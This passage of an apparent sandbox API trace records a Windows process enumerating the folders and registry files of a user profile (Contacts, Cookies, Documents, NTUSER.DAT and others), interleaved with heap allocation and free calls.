lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0175.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0175.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0175.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.470] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0175.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0175.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0175.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0175.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0175.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0175.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.472] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x95f69be0, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0x95f69be0, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0175.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0175.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0175.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0175.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0175.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0175.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.475] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x992af670, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x992af670, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0175.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0175.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.476] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0175.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0175.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0175.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0175.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd8c0 [0175.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd950 [0175.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30688 [0175.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0175.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0175.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.480] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0175.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.482] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0175.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.483] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82850 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x2c40050 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827a0 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d306d0 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30718 [0175.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30760 [0175.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307a8 [0175.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0175.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8c0 | out: hHeap=0x6a0000) returned 1 [0175.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd950 | out: hHeap=0x6a0000) returned 1 [0175.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30688 | out: hHeap=0x6a0000) returned 1 [0175.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0175.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0175.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82850 | out: hHeap=0x6a0000) returned 1 [0175.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0175.487] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98b65310, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98b65310, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0175.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0175.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.493] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0175.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fd28 [0175.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82850 [0175.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0175.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0175.494] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0175.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0175.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x791af7b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa9fca580, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xa9fca580, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xa9f32000, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79bf3690, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c197f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c197f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c3f950, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c3f950, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7945d070, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7945d070, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x214) returned 0x2d2fc98 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30688 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307f0 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30838 [0175.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30880 [0175.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d308c8 [0175.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30910 [0175.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30958 [0175.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309a0 [0175.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0175.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309e8 [0175.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827a0 | out: hHeap=0x6a0000) returned 1 [0175.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0175.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d306d0 | out: hHeap=0x6a0000) returned 1 [0175.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30718 | out: hHeap=0x6a0000) returned 1 [0175.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30760 | out: hHeap=0x6a0000) returned 1 [0175.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d307a8 | out: hHeap=0x6a0000) returned 1 [0175.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 